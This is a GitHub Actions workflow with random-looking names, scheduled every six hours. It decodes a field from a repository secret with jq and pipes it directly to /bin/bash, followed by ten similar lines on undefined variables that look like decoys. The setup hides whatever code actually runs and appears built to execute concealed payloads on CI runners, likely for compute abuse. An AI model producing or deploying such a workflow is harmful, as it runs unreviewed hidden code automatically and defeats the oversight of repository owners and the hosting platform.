name: longzhitao3817

on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: longzhitao3817
        env:
          kwfug697: ${{ secrets.kwfug697 }}
        run: |
          echo $kwfug697 | jq -r .egt96511 | /bin/bash
          echo $szae45 | jq -r .leol2 | /bin/bash
          echo $bbxe0490 | jq -r .fec9015 | /bin/bash
          echo $fun910 | jq -r .rfl6 | /bin/bash
          echo $jz68161 | jq -r .opce67207 | /bin/bash
          echo $o658 | jq -r .xuwpl72190 | /bin/bash
          echo $wa8915 | jq -r .sticu5035 | /bin/bash
          echo $hd97 | jq -r .kkkfe67 | /bin/bash
          echo $aa5 | jq -r .y76 | /bin/bash
          echo $j16753 | jq -r .jca36 | /bin/bash
          echo $nwnrh538 | jq -r .q89 | /bin/bash

